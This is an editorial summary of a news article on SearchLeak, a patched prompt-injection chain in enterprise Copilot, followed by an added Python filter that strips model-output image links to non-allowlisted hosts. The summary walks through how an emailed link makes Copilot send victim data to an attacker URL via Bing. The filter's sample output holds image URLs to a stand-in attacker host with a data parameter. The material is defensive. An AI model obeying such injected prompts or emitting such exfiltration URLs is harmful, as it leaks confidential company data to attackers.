SearchLeak: Prompt-inject enterprise Copilot with a search

· Source: Pivot to AI · Field: Technology & Digital — Artificial Intelligence & Machine Learning, Cybersecurity & Data Privacy, Cloud Computing & IT Infrastructure · Depth: Intermediate, medium

Summary

SearchLeak, a prompt injection vulnerability in Microsoft's enterprise Copilot discovered by Varonis, allows attackers to exfiltrate confidential company information. This one-click attack, patched by Microsoft on June 4th, 2026, chains three vulnerabilities. An attacker sends an email containing a malicious link; when the victim clicks it, the link opens Copilot's enterprise search with a query string that Copilot treats as a prompt. That prompt instructs Copilot to call an attacker-controlled web address with the victim's data encoded in the URL. Because Copilot trusts Bing, Bing then fetches that address, leaking the sensitive information. The chained vulnerabilities are: Copilot treating search strings as direct prompts without sanitization, a race condition that lets an image tag load before output sanitization runs, and Bing fetching the attacker's web address. Microsoft classified the issue as critical (CVE-2026-42824).

Key takeaway

IT professionals evaluating enterprise Copilot deployments should recognize that prompt injection vulnerabilities like SearchLeak are an inherent risk whenever a chatbot performs "real work" and interacts with external services. Prioritize stringent input validation and output sanitization even after vendor patches, and continuously assess the security posture of AI agents that can execute external actions, since new chained vulnerabilities are likely to emerge.

Key insights

Prompt injection remains a fundamental security flaw in enterprise chatbots.

Method

An attacker emails a link; the victim clicks it. The link sends a malicious prompt to Copilot's enterprise search, which then calls an attacker-controlled URL with the victim's data, leaked via Bing.
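
The output-sanitization control the takeaway calls for, applied to the image-tag step in the chain described above, as an added example that is not from the Pivot to AI article, Varonis, or Microsoft. It filters markdown and HTML image/link references in model output against a host allowlist before anything is rendered, so the client never fetches an arbitrary external URL; it also rejects references whose query string is long enough to carry encoded data. The allowlisted host names, the `MAX_QUERY_LEN` threshold and the sample model output are constructed assumptions.

```python
"""
Added example (not the article's or vendor's code): a defensive filter
for LLM-rendered markdown. Only references to allowlisted hosts survive,
so model output cannot make the client fetch an attacker-chosen URL.
"""
import re
from urllib.parse import urlsplit

# Assumption: hosts the client is allowed to fetch images/links from.
ALLOWED_HOSTS = {"contoso.sharepoint.com", "graph.microsoft.com"}
# Assumption: queries longer than this are treated as possible data carriers.
MAX_QUERY_LEN = 64

# Markdown image ![alt](url) or link [text](url), optional "title".
MD_REF = re.compile(r'(!?)\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)')
# HTML <img ... src="url" ...> in any attribute order.
HTML_IMG = re.compile(r'<img\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\'][^>]*>', re.I)


def url_allowed(url: str) -> bool:
    """True only for https URLs to an allowlisted host with a short query."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        return False
    # A long query string is the classic place to hide encoded victim data.
    if len(parts.query) > MAX_QUERY_LEN:
        return False
    return True


def sanitize(markdown: str) -> tuple[str, list[str]]:
    """Strip disallowed references; return (clean_markdown, blocked_urls)."""
    blocked: list[str] = []

    def md_sub(m: re.Match) -> str:
        text, url = m.group(2), m.group(3)
        if url_allowed(url):
            return m.group(0)
        blocked.append(url)
        # Keep visible text (if any) but drop the URL entirely.
        return text if text else "[blocked reference]"

    def img_sub(m: re.Match) -> str:
        url = m.group(1)
        if url_allowed(url):
            return m.group(0)
        blocked.append(url)
        return ""

    out = HTML_IMG.sub(img_sub, markdown)
    out = MD_REF.sub(md_sub, out)
    return out, blocked


# Constructed sample of model output: one legitimate internal link plus
# two external image references carrying a placeholder query parameter.
SAMPLE_OUTPUT = (
    "Here is the file you asked for: "
    "[Q3 plan](https://contoso.sharepoint.com/sites/fin/q3.docx)\n"
    "![](https://example-attacker.invalid/pixel.png?d=PLACEHOLDER)\n"
    '<img src="http://example-attacker.invalid/p.gif?d=PLACEHOLDER">'
)

if __name__ == "__main__":
    clean, blocked = sanitize(SAMPLE_OUTPUT)
    print(clean)
    print("blocked:", blocked)
```

Run the filter on the rendering path, not inside the model prompt: the race condition in the chain is precisely that the image loaded before sanitization ran, so the check has to sit between the model's text and the renderer with no path around it. Log the `blocked` list; a burst of blocked external image references in Copilot output is a useful detection signal on its own.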

Best for: CTO, VP of Engineering/Data, Director of AI/ML, AI Security Engineer, MLOps Engineer, IT Professional

Editorial summary, takeaway, and curation by AIssential. Original article published by Pivot to AI.